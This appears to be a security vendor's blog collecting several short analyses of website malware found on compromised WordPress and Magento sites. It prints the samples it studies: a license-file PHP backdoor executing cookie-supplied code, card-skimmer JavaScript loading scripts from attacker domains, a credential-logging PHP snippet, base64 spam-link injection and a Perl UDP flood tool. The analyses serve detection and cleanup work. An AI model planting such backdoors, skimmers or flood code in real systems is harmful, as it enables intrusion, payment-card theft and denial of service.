Straightforward Backdoor Installer

Malware uses encryption, obfuscation and other tricks to prevent its detection so that the compromised sites stay infected for as long as possible. Quite often it’s not easy to spot a malicious code even if you see it, especially if you are not a professional programmer or security analysts.

But sometimes, the malware is very straightforward. For example, we found this backdoor installer in file called robots.php in one WordPress theme. It doesn’t use any encryption, has properly indented code and very clear descriptive variable name and comments. You shouldn’t think twice when you see such a code:

class Searcher
{
    private $backdoor;
...
    private $backdoorName = 'gpl_license.php';
...
    public function __construct($backdoor)
    {
        $this->backdoor = $backdoor;
    }
...
    $this->chooseDirsForBackdoor();
    while ($this->hasUnconfirmedBackdoors()) {
        $this->addBackdoors();
        $this->checkBackdoors();
    };
...

However this file is only used at early stages of infections when attackers just got access to a vulnerable website and managed to upload this file to the server. Then they use this backdoor installer to create multiple backdoors (gpl_license.php in this case) in various directories. That gpl_license.php backdoor is much more obscure and you might even confuse it with a real license file as if you quickly scroll it, you will only see a real GNU GPL license

<?php /*            GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007
...

Only if you carefully inspect the file you will notice that It’s actually a PHP file and the license text is inside the multiline comment. However, inside the license text, there are two short comment breaks that contain PHP code that allows to execute arbitrary code passed in HTTP cookies:

...
giving you */extract($_COOKIE);/* copy, distribute and/or modify it.
...
which are not */@$F&&@$F($A,$B);/*.  For example, Corresponding Source
...

These two backdoors that use completely different approaches to obfuscation are part of the same attack, which proves that you can never tell what a typical backdoor is and what exactly webmasters should be searching for when we say that they should find and remove all backdoors. Actually, backdoors are the most versatile type of website malware. We have more than a thousand samples of different backdoors and still we find new variations every day. Probably, the most efficient way to detect backdoors is a file integrity monitoring that will report all added/modified files regardless of the code that was added. If you don’t use such a monitoring and want make sure you didn’t miss any backdoors on your server, you can have us scan your site for thousands of different malware patterns.

Another Magento CC stealer

Lately we’ve been analysing multiple credit card stealers for Magento. We are seeing an increase trend there as attackers can more easily monetize a compromised e-commerce site compared to one without credit card data.

This new variation the CC stealer isn’t injected directly into the website but loaded from an external source. Loading the code from another source allows the attacker to perform any modifications in the malware source code without the need of “reinfecting” the site.

Here is a snippet of the code that we found inside Magento's /js/lib/ccard.js

...<!-- Google Code for Remarketing Tag -->if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location)){document.write('<script src="hxxps://jquery -cdn .top/mage .js"></script>')};<!-- Google Code for Remarketing Tag -->

Basically this javascript acts like a man-in-the-middle between the user and the checkout process/page and whenever a credit card information is provided, it allows the original processing from the CMS but at the same time it forwards the data to a malicious domain at hxxps://jquery-cdn . top/ mag.php.

We also found a slightly different version of the malicious code inside /js/scriptaculous/effects.js:

if((new RegExp('onepage|checkout|onestep|fircheckout')).test(window.location)) {document.write('>tpircs/<>"sj.egam/ue.todstats//:spxxh"=crs tpircs<'.split("").reverse().join(""))}

Putting the code in a readable format we get:

if ((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location)) {   document.write('<script src="hxxps:// statsdot. eu/mage.js"></script>)}

In this case, the script uses the domain hxxps:// statsdot. eu to load the javascript and it sends the credit card data over to hxxps://statsdot .eu /mag.php

Interesting point about these domains is that attackers are sending the stolen information through secure channels (https). And, even though the credit card information isn’t processed directly at your shop, it’s very important to ensure that your website is updated and has the latest patches installed.

Moreover, in order to detect, mitigate and prevent such issues from happening, we also recommend having a Website Application Firewall (WAF) in place, keeping regular backups and using a File Integrity Monitoring tool to ensure the integrity of your file system.

SEO Poisoning on nulled templates

We at Sucuri, always stress the risks associated with using themes, plugins or any add-on downloaded from unofficial sources (Nulled Versions). During our investigation process, we found into a theme, a malicious code being used to promote an external website and possibly generate revenue to the “developer” without user’s consent. Inside the downloaded package there were lots of files named index.php and default.php throughout different folders. Those files contained the following base64 code:

 <?php $wfk='PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7dG9wOjA7bGVmdDotOTk5OXB4OyI+CjxhIGhyZWY9Imh0dHA6Ly9qb29tbGE0ZXZlci5ydS9ib3d0aGVtZXMvMjI4Ny1idC1waG90b2dyYXBoeS5odG1sIiB0aXRsZT0iQlQgUGhvdG9ncmFwaHkgLSDRiNCw0LHQu9C+0L0gam9vbWxhIiB0YXJnZXQ9Il9ibGFuayI+QlQgUGhvdG9ncmFwaHkgLSDRiNCw0LHQu9C+0L0gam9vbWxhPC9hPgo8YSBocmVmPSJodHRwOi8vYWxsLWJvb2submV0LyIgdGl0bGU9ItCa0L3QuNCz0LgiIHRhcmdldD0iX2JsYW5rIj7QmtC90LjQs9C4PC9hPgo8L2Rpdj4='; echo base64_decode($wfk); ?>

Decoding it into a human-readable format, we got these “invisible” malicious links:

<div style="position:absolute;top:0;left:-9999px;"><a href="hxxp://joomla4ever .ru/bowthemes/2287-bt-photography.html" title="BT Photography - шаблон joomla" target="_blank">BT Photography - шаблон joomla</a><a href="hxxp://all-book .net/" title="Книги" target="_blank">Книги</a></div>

This kind of infection is commonly injected into Nulled components for different CMS’s and are designed specifically to damage the SEO positioning of a website due to the arbitrary links as well as promoting a particular website with intent to generate revenue for the “developers”.

To reduce the risks, we always recommend downloading any add-on (themes, plugins, extensions) for your site directly from the official source because you never know which extra “feature” you are getting from those “alternative” versions.

You may find more information related to this infection here, here and here.

MiniCMS as a Spam Site Generator

SEO spam is very common for a reason -- money. Spammers are paid to promote websites on Google. We deal with lots of SEO spam cases daily. The most common cases are database infections, theme file infections and random spammy html pages. However, few days ago we found an interesting variation: a whole CMS specially configured and used to load spam on a website.


The client asked to help resolve spam issues in Google search results for their website. It was pretty clear that the doorways were still online when we began the analysis so we quickly pinpointed the source of the spam. The hackers created a directory where they installed a version of the MiniCMS application and populated it with spammy content.

MiniCMS is a legitimate minimalist content management system, that does not use database. To store posts and settings, it uses normal files (dat files for posts), which makes it very easy to install virtually on any server that supports PHP. In this case, there were lots of spam dat files.

This case proves that some site owners don’t realize that they provide domain and free hosting to spammers until they get blacklisted or penalized by Google. This is why it is important to monitor your website for all sorts of anomalies. So keep an eye on Google search results for your site, Search Console reports that may mention suspicious URLs or keywords on your site. You might even what to set up Google Alerts for common spammy keywords on your site. Regular internal and external security scans (for example, provided by our Website Monitoring Service) can help detect the problem even faster.

Blacklist Monitoring for Hackers and Webmasters

An infected site can be efficient for cyber-criminals unless it gets blacklisted. Traffic significantly drops when a URL is on the Google’s Safe Browsing list. And if the hacked site is used for sending out email spam, then the success of the spam campaign directly correlates to absence of the server in anti-spam blacklists. That’s why it is important for hackers to know whether the sites they compromised are blacklisted or not.

Here’s an example of malware that works with Google’s and Spamhaus’s blacklists.


if ($_GET['mod']){
  if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){
    $g_sch=file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');
      $g_sch = str_replace('"listed"', '', $g_sch, $g_out);
      if($g_out){
        header('HTTP/1.1 202');
        exit;
      }
  }

  if($_GET['mod']=='X0X' OR $_GET['mod']=='00X'){
    $sh = gethostbyname($_SERVER['HTTP_HOST'].'.dbl.spamhaus.org');
    if ($sh=='127.0.1.2' or $sh=='127.0.1.4' or $sh=='127.0.1.5' or 
        $sh=='127.0.1.6' or $sh=='127.0.1.102' or $sh=='127.0.1.103' or 
        $sh=='127.0.1.104' or $sh=='127.0.1.105' or $sh=='127.0.1.106'){
      header('HTTP/1.1 203');
      exit;
    }
  }

  header('HTTP/1.1 201');
  exit;
}

header('HTTP/1.1 302 Found');
header('Location: hxxp://rx-webmart[.]su');

As you can see, by default it’s just a web spam malware that redirects visitors to a site that sells counterfeit drugs. But if you pass certain parameters to this script it will check whether the site is blacklisted by Google and/or by Spamhaus (which suggests that the same campaign also involves email spamming). The result is returned via an HTTP code:

  • 201 - not blacklisted
  • 202 - blacklisted by Google
  • 203 - blacklisted by Spamhaus.org

The use of HTTP codes instead of human readable results makes us think that this functionality is used by a C&C server that regularly polls blacklisting information from all compromised sites.

While this sort monitoring may be useful to hackers, it’s even more useful to normal site owners who risk their business and reputation if their sites get blacklisted. For them, it is important to be able investigate and resolve such incidents as soon as possible. That’s why Sucuri Website Antivirus includes monitoring of 10 blacklists (Google Safe Browsing, SpamHaus DBL, Norton Safe Web, PhishTank, Opera, SiteAdvisor, Bitdefender, Yandex, ESET, plus our own Sucuri blacklist). If websites get blacklisted for any reason, not only do we inform the site owners about it, but also help clean and remove their sites from the blacklists.

Another sample of a Magento compromise for profit

We are often seeing malicious code being used to steal credit card details and sensitive information from compromised Magento sites, but this one caught our eyes as it was a bit different from the others on how the information was collected and stored.

Usually, the attacker send all the sensitive information via e-mail but in this case a text file with a "jpg" extension is created to store all the data:

if(preg_match("/".base64_decode('YWRtaW58cGF5bWVudHxvcmRlcnxzYXZlT3JkZXJ8b25lcGFnZXxjaGVja291dA==')."/i", $_SERVER["REQUEST_URI"])){ 
if(!empty($_POST))@file_put_contents(base64_decode('L2Nocm9vdC9ob21lL2RhaWx5Z3JhL2RhaWx5Z3JhYnMuY29tL2h0bWwvbWVkaWEvY2F0YWxvZy9wcm9kdWN0LzIvMS8yMV8xLmpwZw=='), base64_encode( @serialize($_POST)."--".@seralize($_COOKIE) )."\n", FILE_APPEND);
}

Basically, this code writes all the requests that contain one these words in the URL:"admin|payment|order|saveOrder|onepage|checkout" to a file located in "/media/catalog/product/2/1/21_1.jpg".

As you can imagine at this point, the customer's credit card details and admin's login are now available for download.

The data is encoded and serialized inside the file "21_1.jpg" but after revert these steps you'll see something like this:

[payment] => Array

        (
            [method] => vm
            [cc_type] => VI
            [cc_number] => XXXXX -> indistinct cc number
            [c_exp_month] => 9
            [cc_exp_year] => 2017
            [cc_cid] => 048
        )

Among other data, you'll see admin passwords, customer data and credit card details. It's quite scary realize that all these information is being stolen and attackers are continually changing their methods to keep undetected.

This particularly code is usually added inside the files "./app/code/core/Mage/Core/functions.php" or "./lib/Varien/Autoload.php" but other files may be affected. We recommend check constantly the core files for any change and keep all the software updated. Also, for obvious reasons, it's incredibly important change the password for all the admin users to avoid re-infections.

Finally, If you need a professional help, you can always count on us.

Infected websites being used to distributed denial of...

After a website is compromised, it can be misused in multiple ways. We often see it being used on Spam SEO campaigns or to distribute drive-by-downloads. However, last week, we found an interesting DDoS (Denial of Service) tool on one of our clients websites that I would like to share.

The code was added to /var/tmp and being called by an external PHP script to allow a remote attacker to start DDoS against specific targets. This is a snippet of the malicious code:

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpakets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &"); 
goto randpackets;
}
packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

The malware takes an $ip, $port and $time as an argument to launch the attack:

$ARGC=@ARGV;
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[0];
$time=$ARGV[0];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

Once the information is supplied, the script sends as many UDP packets as possible trying to flood the victim’s network. The side effect is that the compromised server could also get overloaded by its resources (cpu/memory) consumption and also overflow bandwidth limits.

If your site is currently experiencing high usage of server resources or unexpected behavior, it could be an indication of a compromise. It’s equally important to be on the lookout for such issues.

You can always count on CloudProxy, our website firewall, to help you protecting your site against this and many other attacks.